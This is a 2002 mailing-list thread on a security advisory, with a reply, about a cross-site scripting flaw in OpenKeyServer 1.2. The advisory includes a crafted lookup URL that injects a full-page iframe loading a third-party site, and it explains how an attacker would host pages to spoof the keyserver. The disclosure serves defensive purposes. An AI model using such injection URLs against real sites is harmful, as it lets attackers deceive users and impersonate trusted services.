Re: (Fwd) Keyservers Cross Site Scripting (When CSS Gets Dangerous)

[Michael Young]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

From: Stefan Kelm [EMAIL PROTECTED]
 This is of particular danger when it comes to keyservers, since the key
 information itself is usually considered as highly trustworthy.

Absolutely not.  Keyservers are wide open public repositories.  They
can, and do, contain arbitrary garbage.  Users should only trust
material that they can verify through signatures or direct contact.

Moreover, clients should only be generating well-formed URLs
for key lookups.  What am I missing?

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQA/AwUBPMRMGVMkvpTT8vCGEQKSRQCgi3Uvj/w4wAtFsBzM0Yt+CglxTj0AoNCj
vADEMPSTqze3uqdKfLUp3JyT
=IXGp
-END PGP SIGNATURE-

Keyservers Cross Site Scripting (When CSS Gets Dangerous)

[Noam Rathaus]

Hi,

a while ago we discovered this, we have tried to solve this issue with OKS's
developer but with no success, maybe further posting of the issue will help.


-
SUMMARY

 http://www.openkeyserver.org/ OKS (OpenKeyServer) has been developed to
cope with the fast growing number of PKS encryption software baring in
mind the need for reliability. OKS provides a secure repository for a
large amount of PGP public keys. Its architecture is composed of several
inter-communicating modules and allows you to scale it to fit your needs.
The capacity of OKS goes from keyrings of hundred keys to keyrings of
hundreds of thousands.

A security vulnerability in the way the server returns results of key
queries allows attackers to insert malicious code into existing replies.
This is of particular danger when it comes to keyservers, since the key
information itself is usually considered as highly trustworthy.

DETAILS

Vulnerable systems:
OpenKeyServer version 1.2

Example:
http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennom
atch%2Cnetenerrorsearch=iframe%20style=position:absolute;left:0;top:0%20
%20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src=
http://www.securiteam.com/openkeyservertemp//iframeop=index

(All  should be present and not replaced by lt;).

In order to complete the attack, all you need to do is create a few small
HTMLs on your server, causing anyone accessing the above URL to not know
he is no longer accessing keyserver.net but rather someone else's server.

Vendor response:
We have received the following response (Tuesday, March 05, 2002 20:33):
We thank you for informing us of this vulnerability onto our software and
we are pleased to announce you that a fix to this trouble will be
available into the next release of the OpenKeyServer.

Therefore be sure we will provide you with this new version in order for
your team to keep your database up-to-date.

We remain at your entire disposal and please do not hesitate to contact us
for any other remarks regarding our software.

Best regards,
S. Lemmens

We have not heard from them again, even though we sent them a message
requesting information when the newer version will be available.


ADDITIONAL INFORMATION

The information has been provided by  mailto:[EMAIL PROTECTED]
SecurITeam Experts and  mailto:[EMAIL PROTECTED] Sebastien Lemmens.

-


Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com